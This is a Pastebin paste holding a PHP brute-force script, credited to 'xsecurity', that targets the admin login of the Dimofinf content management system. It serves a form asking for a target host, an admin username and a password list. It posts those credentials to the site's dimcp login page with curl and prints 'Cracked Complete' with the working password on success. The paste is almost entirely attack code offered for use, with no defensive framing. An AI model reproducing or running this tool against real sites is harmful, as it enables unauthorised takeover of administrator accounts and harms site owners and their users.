Advertisement
Ribang

Dimofinf Brute Force

Feb 4th, 2018
391
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
  1. <?
  2. @set_time_limit(0);
  3. /*
  4. coded by xsecurity
  5. twitter : https://twitter.com/xSecLabs
  6. greets to : Group x3
  7. home : sec4ever.com | is-sec.com
  8. */
  9. echo "<title>Dimofinf Brute Force By xSecurity</title>
  10. <form method='POST'>
  11. <center>
  12. <font size='2' face='Tahoma'>Dimofinf Brute Force By <b>xSecurity</b></font><br>
  13. <input type='text' name='host' placeholder='target.com/dimofinf'>
  14. <input type='text' name='user' placeholder='admin'><br>
  15. <textarea name='pass' placeholder='passwords' cols='29' rows='15'></textarea><br>
  16. <input type='submit' value='Brute'>
  17. </center>";
  18. $xsec = new xsec();
  19. $xsec->login();
  20.  
  21. class xsec
  22. {
  23. private $host;
  24. private $user;
  25. private $pass;
  26.  
  27. function login()
  28. {
  29. $hostname = $this->host = $_POST['host'];
  30. $username = $this->user = $_POST['user'];
  31. $password = $this->pass = $_POST['pass'];
  32.  
  33. $curl = curl_init();
  34. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  35. curl_setopt($curl, CURLOPT_POST, 1);
  36. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  37. curl_setopt($curl, CURLOPT_URL, $hostname."/dimcp/login.php?action=enter");
  38. curl_setopt($curl, CURLOPT_POSTFIELDS, "name=".$username."&password=".$password);
  39. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  40. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  41. $login = curl_exec($curl);
  42. print $login;
  43. if(preg_match('/Dimensions Of Information Inc/', $login))
  44. {
  45. print "<font face='Tahoma' size='2'>Cracked Complete -> <b>".$hostname."</b> & <b>".$username."</b> -> <b>".$password."</b></font>";
  46. }
  47. }
  48. }
  49. system("del cookie.txt");
  50. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement